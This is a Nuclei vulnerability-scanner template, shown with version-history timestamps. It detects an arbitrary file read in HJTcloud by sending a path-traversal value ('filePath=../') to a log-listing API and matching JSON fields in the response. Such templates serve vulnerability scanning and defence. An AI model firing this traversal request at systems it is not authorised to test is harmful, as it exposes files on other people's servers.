nuclei-templates/vulnerabilities/other/hjtcloud-rest-arbitrary-fil...

35 lines
662 B
YAML
Raw Normal View History

id: hjtcloud-rest-arbitrary-file-read
info:
2021-05-31 08:49:23 +00:00
name: HJTcloud Arbitrary file read
author: pikpikcu
severity: low
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
2021-05-31 08:49:23 +00:00
tags: hjtcloud,lfi
requests:
- method: GET
path:
2021-05-31 08:49:23 +00:00
- "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
matchers-condition: and
matchers:
- type: word
words:
2021-06-01 10:38:41 +00:00
- '"name":'
- '"length":'
- '"filePath":'
- '"list":'
2021-05-31 08:49:23 +00:00
condition: and
2021-06-01 10:38:41 +00:00
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200